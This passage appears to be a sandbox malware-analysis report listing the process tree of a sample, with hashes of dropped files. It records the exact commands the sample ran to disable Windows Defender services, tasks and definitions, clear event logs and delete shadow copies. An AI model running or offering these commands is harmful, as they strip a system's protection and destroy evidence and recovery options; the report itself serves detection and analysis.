      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      PID:4548

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      PID:1056

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      PID:64

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      PID:4016

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID:4820

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID:1624

    C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      PID:2920

    C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      PID:4588

    C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      PID:3528

    C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      PID:4508

    C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      PID:3212

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      PID:4632

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      PID:1816

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      PID:3468

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      PID:3804

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      PID:4896

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      PID:2888

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      PID:4024

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      PID:4660

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      PID:2168

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      PID:2756

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service
      PID:4556

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      PID:2308

    C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe cl system
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
      PID:1340

    C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe cl security
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
      PID:4544

    C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe cl application
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
      PID:2072

    C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken
      PID:864

    C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
      PID:3828

    C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      PID:4396

    C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
      PID:4616
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIOAVProtection $true
          - Suspicious behavior: EnumeratesProcesses
          PID:4076

    C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
      PID:2260
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableRealtimeMonitoring $true
          - Suspicious behavior: EnumeratesProcesses
          PID:4860
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize 2KB
MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Filesize 18KB
MD5 0f4bbc553c528755d6cc347208d7127d
SHA1 2f0500f1160c9bcbd23463f1ece4c7ff1bc54961
SHA256 d68b3585445336084dbf6b4551a28bb461ce7c7d8a5d74a5cc0069b2eb9e0b06
SHA512 262a7021ebc39433b20287652fee658cc1e2da7115e0ed12714d4da9511785111fe296f9f757326042bbafbba131788a3afa36ece1b3adcd7297ecbff342d211